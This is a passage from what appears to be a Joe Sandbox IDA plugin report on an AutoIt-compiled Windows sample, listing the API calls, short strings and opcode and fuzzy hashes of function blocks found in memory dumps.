                                                                • API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
                                                                • String ID:
                                                                • API String ID: 2704283638-0
                                                                • Opcode ID: 3c9bb53a9c625b0fa3120c1457a49dda7752da0eaa0799d5ac1522a378d6cae3
                                                                • Instruction ID: 29d91fcc3a00f7858a0d1cb036de5ad8bf06d1f5b526623c15188dd292109846
                                                                • Opcode Fuzzy Hash: 3c9bb53a9c625b0fa3120c1457a49dda7752da0eaa0799d5ac1522a378d6cae3
                                                                • Instruction Fuzzy Hash: 1801C435E0BA11E7D713AF66941675DBB60BF04710F164105F4146B6C0C7207D11CFC2
                                                                APIs
                                                                  • Part of subcall function 002FAF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 002FAFE3
                                                                  • Part of subcall function 002FAF83: SelectObject.GDI32(?,00000000), ref: 002FAFF2
                                                                  • Part of subcall function 002FAF83: BeginPath.GDI32(?), ref: 002FB009
                                                                  • Part of subcall function 002FAF83: SelectObject.GDI32(?,00000000), ref: 002FB033
                                                                • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0034EA8E
                                                                • LineTo.GDI32(00000000,?,?), ref: 0034EA9B
                                                                • EndPath.GDI32(00000000), ref: 0034EAAB
                                                                • StrokePath.GDI32(00000000), ref: 0034EAB9
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                 • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                • String ID:
                                                                • API String ID: 1539411459-0
                                                                • Opcode ID: e306b53a8f85114d8cb4945b2f9df3c42c115cdbd04003f9cf3912bdf6cc5253
                                                                • Instruction ID: 1ccc37423db2d97fc24974adff7e65f15a7808c2b4ef1de84e57c20567010cd4
                                                                • Opcode Fuzzy Hash: e306b53a8f85114d8cb4945b2f9df3c42c115cdbd04003f9cf3912bdf6cc5253
                                                                • Instruction Fuzzy Hash: 54F05E31505259BBDB139F94AD09FCA3F5DAF0A311F188201FE11650E187B55561CBA5
                                                                APIs
                                                                • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0031C84A
                                                                • GetWindowThreadProcessId.USER32(?,00000000), ref: 0031C85D
                                                                • GetCurrentThreadId.KERNEL32 ref: 0031C864
                                                                • AttachThreadInput.USER32(00000000), ref: 0031C86B
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                 • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                • String ID:
                                                                • API String ID: 2710830443-0
                                                                • Opcode ID: 02b09f83a2be47231b813afee3fde909eb8a142dac1e8fbca98d6aed40cb782a
                                                                • Instruction ID: 7a971773f1b287d8c72040dbb04c4e5c4049e9e4c3ff5a7d71e62b9998c52c39
                                                                • Opcode Fuzzy Hash: 02b09f83a2be47231b813afee3fde909eb8a142dac1e8fbca98d6aed40cb782a
                                                                • Instruction Fuzzy Hash: C0E03971A81228BADB221BA2DC4DEDB7F1CEF0A7A1F40C021F60984461C6B18580CBE0
                                                                APIs
                                                                • GetCurrentThread.KERNEL32 ref: 0031B0D6
                                                                • OpenThreadToken.ADVAPI32(00000000,?,?,?,0031AC9D), ref: 0031B0DD
                                                                • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,0031AC9D), ref: 0031B0EA
                                                                • OpenProcessToken.ADVAPI32(00000000,?,?,?,0031AC9D), ref: 0031B0F1
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                 • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: CurrentOpenProcessThreadToken
                                                                • String ID:
                                                                • API String ID: 3974789173-0
                                                                • Opcode ID: 9882fb826402b612be52ee28db1ac3ee3484e056be59847ec363f36b94ec9259
                                                                • Instruction ID: 11dcee5188e7b6ee7368538129271ef9bf5d057c8d5e168774c63fdb7167ef94
                                                                • Opcode Fuzzy Hash: 9882fb826402b612be52ee28db1ac3ee3484e056be59847ec363f36b94ec9259
                                                                • Instruction Fuzzy Hash: 5CE08632F01212DBD7211FB25C0CB877BACEF59791F12C818F241DA040DBB48441C760
                                                                APIs
                                                                • GetSysColor.USER32(00000008), ref: 002FB496
                                                                • SetTextColor.GDI32(?,000000FF), ref: 002FB4A0
                                                                • SetBkMode.GDI32(?,00000001), ref: 002FB4B5
                                                                • GetStockObject.GDI32(00000005), ref: 002FB4BD
                                                                • GetWindowDC.USER32(?,00000000), ref: 0035DE2B
                                                                • GetPixel.GDI32(00000000,00000000,00000000), ref: 0035DE38
                                                                • GetPixel.GDI32(00000000,?,00000000), ref: 0035DE51
                                                                • GetPixel.GDI32(00000000,00000000,?), ref: 0035DE6A
                                                                • GetPixel.GDI32(00000000,?,?), ref: 0035DE8A
                                                                • ReleaseDC.USER32(?,00000000), ref: 0035DE95
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Similarity
                                                                • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                • String ID:
                                                                • API String ID: 1946975507-0
                                                                • Opcode ID: a2f47c813905f373556adfb336192128153e4772f1df9a755a5862aedb788f83
                                                                • Instruction ID: 2c48b93f7619931c4d30e6673339ac12b999f0fc8009c07e17c71e2b5ecb5749
                                                                • Opcode Fuzzy Hash: a2f47c813905f373556adfb336192128153e4772f1df9a755a5862aedb788f83
                                                                • Instruction Fuzzy Hash: 94E06D31600240AADF231F64EC0DBD83F15AB12336F00C226FB6A580E1C3F18584CB11
                                                                APIs
                                                                Similarity
                                                                • API ID: CapsDesktopDeviceReleaseWindow
                                                                • String ID:
                                                                • API String ID: 2889604237-0
                                                                • Opcode ID: 902ce345d71579c04fdf4921e9d4544ec80547244107242843144fa4993cb15c
                                                                • Instruction ID: d6745ddd170275c1bd394d7de2097f1e5afceb2781e2c8c6901109f8b8dafa36
                                                                • Opcode Fuzzy Hash: 902ce345d71579c04fdf4921e9d4544ec80547244107242843144fa4993cb15c
                                                                • Instruction Fuzzy Hash: 60E04FB1A00204EFDB025F70DC48A2DBBADEB4C351F12C816FD5A87250CBF498409F50
                                                                APIs
                                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0031B2DF
                                                                • UnloadUserProfile.USERENV(?,?), ref: 0031B2EB
                                                                • CloseHandle.KERNEL32(?), ref: 0031B2F4
                                                                • CloseHandle.KERNEL32(?), ref: 0031B2FC
                                                                  • Part of subcall function 0031AB24: GetProcessHeap.KERNEL32(00000000,?,0031A848), ref: 0031AB2B
                                                                  • Part of subcall function 0031AB24: HeapFree.KERNEL32(00000000), ref: 0031AB32
                                                                Similarity
                                                                • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                • String ID:
                                                                • API String ID: 146765662-0
                                                                • Opcode ID: 8528eafc1d587437752d7e6336342ef788ae85aef1cbf9a5148495137363dd8c
                                                                • Instruction ID: 1fd03fd8f7672e770c7cee5991d4656a13acfb545f2adfac98cc695ce283b07a
                                                                • Opcode Fuzzy Hash: 8528eafc1d587437752d7e6336342ef788ae85aef1cbf9a5148495137363dd8c
                                                                • Instruction Fuzzy Hash: FFE0E63A604405BFCB032F95EC08859FF7AFF88321710C621F61581571CB72A471EB91
                                                                APIs
                                                                Similarity
                                                                • API ID: CapsDesktopDeviceReleaseWindow
                                                                • String ID:
                                                                • API String ID: 2889604237-0
                                                                • Opcode ID: 5f478153dd08201d2c78db2e4b54dd2bb181a47f334075522d91f58f831de1fe
                                                                • Instruction ID: 9bebc2a493c1c757d1d2a1ae54c9caee3d6f825e2e4cc450210799825018144b
                                                                • Opcode Fuzzy Hash: 5f478153dd08201d2c78db2e4b54dd2bb181a47f334075522d91f58f831de1fe
                                                                • Instruction Fuzzy Hash: 5DE046B1A00204EFDB025F70DC4862DBBA9EB4C390F12C81AFA5A8B250CBF898008F10
                                                                APIs
                                                                • OleSetContainedObject.OLE32(?,00000001), ref: 0031DEAA
                                                                Strings
                                                                Similarity
                                                                • API ID: ContainedObject
                                                                • String ID: AutoIt3GUI$Container
                                                                • API String ID: 3565006973-3941886329
                                                                • Opcode ID: 783852e742430486f8124b32737573d59b72b284aecf8d97e13189ed4bcb63b7
                                                                • Instruction ID: 2f17c55f29e47c83ebe098514c106188cdf21cfc34b672ac9a0795f18e7d8418
                                                                • Opcode Fuzzy Hash: 783852e742430486f8124b32737573d59b72b284aecf8d97e13189ed4bcb63b7
                                                                • Instruction Fuzzy Hash: 1F915874600601AFDB19DF64C884BAAB7F9BF49710F10846DF94ACF690DB71E981CB60
                                                                APIs
                                                                  • Part of subcall function 002FC6F4: _wcscpy.LIBCMT ref: 002FC717
                                                                  • Part of subcall function 002E936C: __swprintf.LIBCMT ref: 002E93AB
                                                                  • Part of subcall function 002E936C: __itow.LIBCMT ref: 002E93DF
                                                                • __wcsnicmp.LIBCMT ref: 0032DEFD
                                                                • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0032DFC6
                                                                Strings
                                                                Similarity
                                                                • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                                • String ID: LPT
                                                                • API String ID: 3222508074-1350329615
                                                                • Opcode ID: bae68019986ba4c06ac42f0c5d50470aae5bc4cc3b2219e32cbb8f14d19d3c8b
                                                                • Instruction ID: 8db41689098a23ec402212fad5c1460af2eaab52406b19fda7619f89537b02d0
                                                                • Opcode Fuzzy Hash: bae68019986ba4c06ac42f0c5d50470aae5bc4cc3b2219e32cbb8f14d19d3c8b
                                                                • Instruction Fuzzy Hash: 4161B375A00225AFCB15DF99D982EAEB7B8FF08310F11806AF546AB291D770AE41CF54
                                                                APIs
                                                                Strings
                                                                Similarity
                                                                • API ID: _wcscpy
                                                                • String ID: I/5$I/5
                                                                • API String ID: 3048848545-3346013609
                                                                • Opcode ID: 88dfdb524e9d45900ed7a20722aa58de949687d2b7979f4fca71de7ff0cb1198
                                                                • Instruction ID: 6454ea65542aae3081545f9f28d12dca57d050a805305124161ea893b4bf920e
                                                                • Opcode Fuzzy Hash: 88dfdb524e9d45900ed7a20722aa58de949687d2b7979f4fca71de7ff0cb1198
                                                                • Instruction Fuzzy Hash: 8C410831900236BACF36EF99E841AFEB770EF18710F55505AF981AB191DB305E92C760
                                                                APIs
                                                                • Sleep.KERNEL32(00000000), ref: 002FBCDA
                                                                • GlobalMemoryStatusEx.KERNEL32 ref: 002FBCF3
                                                                Strings
                                                                Similarity
                                                                • API ID: GlobalMemorySleepStatus
                                                                • String ID: @
                                                                • API String ID: 2783356886-2766056989
                                                                • Opcode ID: 9944fb33b3fa34e9297ce24868504a8c8578e1f38578600624ef98e5cd15460d
                                                                • Instruction ID: 3e3d9d5410126d17101067c1b1e1617a12f14a497784d23c10c396dc61b65ca1
                                                                • Opcode Fuzzy Hash: 9944fb33b3fa34e9297ce24868504a8c8578e1f38578600624ef98e5cd15460d
                                                                • Instruction Fuzzy Hash: 2C513971418748DBE320AF14D886BAFBBECFB95394F41485EF2C8420A2DF71956C8B56
                                                                APIs
                                                                  • Part of subcall function 002E44ED: __fread_nolock.LIBCMT ref: 002E450B
                                                                • _wcscmp.LIBCMT ref: 0032C65D
                                                                • _wcscmp.LIBCMT ref: 0032C670
                                                                Strings
                                                                Similarity
                                                                • API ID: _wcscmp$__fread_nolock
                                                                • String ID: FILE
                                                                • API String ID: 4029003684-3121273764
                                                                • Opcode ID: a520db34d5510299fdc72f8390cf3d437987223a1acf3091125a5d7a29789564
                                                                • Instruction ID: e81df860063b1b2fd8d22ad7ff809c5fde77be7162202ec2bf3c440a5fae9175
                                                                • Opcode Fuzzy Hash: a520db34d5510299fdc72f8390cf3d437987223a1acf3091125a5d7a29789564
                                                                • Instruction Fuzzy Hash: 0341F372A0025ABBDF21ABA4DC42FEF77B9AF49700F001069F605FB181D770AA04CB60
                                                                APIs
                                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 0034A85A
                                                                • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0034A86F
                                                                Strings
                                                                Similarity
                                                                • API ID: MessageSend
                                                                • String ID: '
                                                                • API String ID: 3850602802-1997036262
                                                                • Opcode ID: e310fd039d9193d20b51b26e416c0d296a9a1030401400c5a1a93167240334b4
                                                                • Instruction ID: 6345be16b0ab7c2ec0523760b87d6926217ccb8507a9a0ee1f61e60b6475aeff
                                                                • Opcode Fuzzy Hash: e310fd039d9193d20b51b26e416c0d296a9a1030401400c5a1a93167240334b4
                                                                • Instruction Fuzzy Hash: 9341F575E406099FDB15CFA8C880BDABBF9FB09300F15006AE905EB391D770A942CFA1
                                                                APIs
                                                                • DestroyWindow.USER32(?,?,?,?), ref: 0034980E
                                                                • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 0034984A
                                                                Strings
                                                                Similarity
                                                                • API ID: Window$DestroyMove
                                                                • String ID: static
                                                                • API String ID: 2139405536-2160076837
                                                                • Opcode ID: 23f5935ef7f6e13af646252f383150b4393787551597944701f152c725bba3cb
                                                                • Instruction ID: 7479328e2c727790611b04388a8e3b09eefc7781cdd46507e7985b72bedd12b3
                                                                • Opcode Fuzzy Hash: 23f5935ef7f6e13af646252f383150b4393787551597944701f152c725bba3cb
                                                                • Instruction Fuzzy Hash: 4C319E71110204AAEB119F38CC81BFB77ADFF59760F01861AF9A9CB190CA71AC91CB60
                                                                APIs
                                                                • _memset.LIBCMT ref: 003251C6
                                                                • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00325201
                                                                Strings
                                                                Similarity
                                                                • API ID: InfoItemMenu_memset
                                                                • String ID: 0
                                                                • API String ID: 2223754486-4108050209
                                                                • Opcode ID: 1da1c426bbc042b80db68d945da0ff50837643b3078e7ef25cb4feec799a4b92
                                                                • Instruction ID: beaafc09c7eb960a4f641f56fa33439a005cb138d95c067bc267f24b551afdb0
                                                                • Opcode Fuzzy Hash: 1da1c426bbc042b80db68d945da0ff50837643b3078e7ef25cb4feec799a4b92
                                                                • Instruction Fuzzy Hash: AD31D831600724EBEB2ACF99E945BAEBBF8FF45350F154829E985E61E0D7709B44CB10
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: __snwprintf
                                                                • String ID: , $$AUTOITCALLVARIABLE%d
                                                                • API String ID: 2391506597-2584243854
                                                                • Opcode ID: 6bb02ad9875adcc39f6ecd58f230ba018ab0e88bc13b43b461657d42849a9105
                                                                • Instruction ID: 643490a74afeb7072010aee881b531a7f7e4beb4c6f8f9c98b30bce8e516d51a
                                                                • Opcode Fuzzy Hash: 6bb02ad9875adcc39f6ecd58f230ba018ab0e88bc13b43b461657d42849a9105
                                                                • Instruction Fuzzy Hash: 8721AD71650218BFCF16EFA5C883EEE73B4AF48344F504469F505AB181DB70EA65CBA1
                                                                APIs
                                                                • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0034945C
                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00349467
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: MessageSend
                                                                • String ID: Combobox
                                                                • API String ID: 3850602802-2096851135
                                                                • Opcode ID: cff0396042147d61c16589e848f942b4233caf645f1ae7d6fcc663c82bf44f46
                                                                • Instruction ID: 7d14bb84ef50c647555ffc04206c5909f8d0d821932b9898dcbdeeef6c884b5b
                                                                • Opcode Fuzzy Hash: cff0396042147d61c16589e848f942b4233caf645f1ae7d6fcc663c82bf44f46
                                                                • Instruction Fuzzy Hash: 031198717101086FEF12DF55DC81FBB37AFEB493A4F114126F9199B2A0D671AC528760
                                                                APIs
                                                                  • Part of subcall function 002FB34E: GetWindowLongW.USER32(?,000000EB), ref: 002FB35F
                                                                • GetActiveWindow.USER32 ref: 0034DA7B
                                                                • EnumChildWindows.USER32(?,0034D75F,00000000), ref: 0034DAF5
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Window$ActiveChildEnumLongWindows
                                                                • String ID: T13
                                                                • API String ID: 3814560230-3984144858
                                                                • Opcode ID: b9b389875d2ee226f81c41e4bfb40476b9ba3af16d455206a8449a1d3ad3cecc
                                                                • Instruction ID: 98b8f6e1e2fa2833bd4366b4323d8b1d391b2e08de9387aca39aef702d51fe2a
                                                                • Opcode Fuzzy Hash: b9b389875d2ee226f81c41e4bfb40476b9ba3af16d455206a8449a1d3ad3cecc
                                                                • Instruction Fuzzy Hash: 14211B79604205DFC716DF28D854AA6B7E9EB5A320F290619F966CB3E0D730B810CF60
                                                                APIs
                                                                  • Part of subcall function 002FD17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 002FD1BA
                                                                  • Part of subcall function 002FD17C: GetStockObject.GDI32(00000011), ref: 002FD1CE
                                                                  • Part of subcall function 002FD17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 002FD1D8
                                                                • GetWindowRect.USER32(00000000,?), ref: 00349968
                                                                • GetSysColor.USER32(00000012), ref: 00349982
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                • String ID: static
                                                                • API String ID: 1983116058-2160076837
                                                                • Opcode ID: 2b3cbd7eaeb71569c59f93e3328de09afa50c207ee0d806437248aacec34e68a
                                                                • Instruction ID: 6b9eb78c0942693a0b59ed223cd4f7f9adfe280d884542b12a8878a452cabbfd
                                                                • Opcode Fuzzy Hash: 2b3cbd7eaeb71569c59f93e3328de09afa50c207ee0d806437248aacec34e68a
                                                                • Instruction Fuzzy Hash: 5B11297262020AAFDB05DFB8CC45AEA7BA8FB08354F014629F956E6250D774E851DB60
                                                                APIs
                                                                • GetWindowTextLengthW.USER32(00000000), ref: 00349699
                                                                • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 003496A8
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: LengthMessageSendTextWindow
                                                                • String ID: edit
                                                                • API String ID: 2978978980-2167791130
                                                                • Opcode ID: 184117096bf8eea2ce3e8813d433eed8024a3dd8f1ac756e710d3f49ea809d0b
                                                                • Instruction ID: cc847bcf545ddc737344f041a8f8af308204ac412d9ebb79cb77b9f8ba3fba4f
                                                                • Opcode Fuzzy Hash: 184117096bf8eea2ce3e8813d433eed8024a3dd8f1ac756e710d3f49ea809d0b
                                                                • Instruction Fuzzy Hash: 2611BF71500108ABEB225F64DC44FEB37AEEB05378F124315F9259B1E0C779EC509B60
                                                                APIs
                                                                • _memset.LIBCMT ref: 003252D5
                                                                • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 003252F4
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: InfoItemMenu_memset
                                                                • String ID: 0
                                                                • API String ID: 2223754486-4108050209
                                                                • Opcode ID: 7260a401e2c97feb81be7b18ade71143eadb4c0862016bf0831db4740fbad390
                                                                • Instruction ID: bd43714d6bac1ddaeae6c9b17ea272ef512d9caaa2056dce36ad410a1f37b4b7
                                                                • Opcode Fuzzy Hash: 7260a401e2c97feb81be7b18ade71143eadb4c0862016bf0831db4740fbad390
                                                                • Instruction Fuzzy Hash: F311937A901734EBDB12DA98E944B9D77BCAB06790F160015EA91A7190D3B0EE04C7A1
                                                                APIs
                                                                • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00334DF5
                                                                • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00334E1E
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Internet$OpenOption
                                                                • String ID: <local>
                                                                • API String ID: 942729171-4266983199
                                                                • Opcode ID: d3b03cfa4e421f96be988b3d76051e1066482f0d94cedf0ae734e4f2c0fb5c25
                                                                • Instruction ID: 2a57905ce762989bf3f5b99bc6b48ace0a84e5d010400119a15b6ecd98639e96
                                                                • Opcode Fuzzy Hash: d3b03cfa4e421f96be988b3d76051e1066482f0d94cedf0ae734e4f2c0fb5c25
                                                                • Instruction Fuzzy Hash: ED117CB0605221BBDB268F61C8D9EFBFBACFF16755F10822AF51596540D3B06990C6E0
                                                                APIs
                                                                • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 003137A7
                                                                • ___raise_securityfailure.LIBCMT ref: 0031388E
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: FeaturePresentProcessor___raise_securityfailure
                                                                • String ID: (:
                                                                • API String ID: 3761405300-3132975541
                                                                • Opcode ID: e0f2382ec1aff8383438964c895b7c9775991a466cdb8b8961e7a5a5a5bf4fab
                                                                • Instruction ID: 9abeb8b1b1d5e7c5bb5c6434c074bd46a57433651a2692c5a48090007f7f0fa6
                                                                • Opcode Fuzzy Hash: e0f2382ec1aff8383438964c895b7c9775991a466cdb8b8961e7a5a5a5bf4fab
                                                                • Instruction Fuzzy Hash: 8C2107B5541B04DAD74EDF65F995A407BF8BB4E310F10982AE5048B3A0E3F16980EF86
                                                                APIs
                                                                • inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0033A84E
